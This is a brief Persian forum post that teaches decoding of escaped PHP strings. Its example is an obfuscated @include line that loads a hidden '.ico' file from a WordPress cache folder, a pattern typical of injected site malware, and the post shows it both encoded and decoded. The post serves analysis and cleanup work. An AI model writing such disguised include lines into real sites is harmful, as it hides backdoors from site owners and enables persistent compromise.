آموزش دیکد :

کد:
@include "\057h\157m\145/\141s\162i\142a\057d\157m\141i\156s\057a\163r\145n\141m\141y\145s\150.\143o\155/\160u\142l\151c\137h\164m\154/\167p\055c\157n\164e\156t\057c\141c\150e\057c\162i\164i\143a\154-\143s\163/\0566\145c\067a\1468\063.\151c\157";
خوب کد بالا رو وقتی دیکد کنید ، میشه :

کد:
@include "/home/asriba/domains/domain.com/public_html/wp-content/cache/critical-css/.6ec7af83.ico";

این نوع از دیکد رو بهش میگن php hex decode

به زودی ابزار و توضیحات بیشتری رو قرار خواهم داد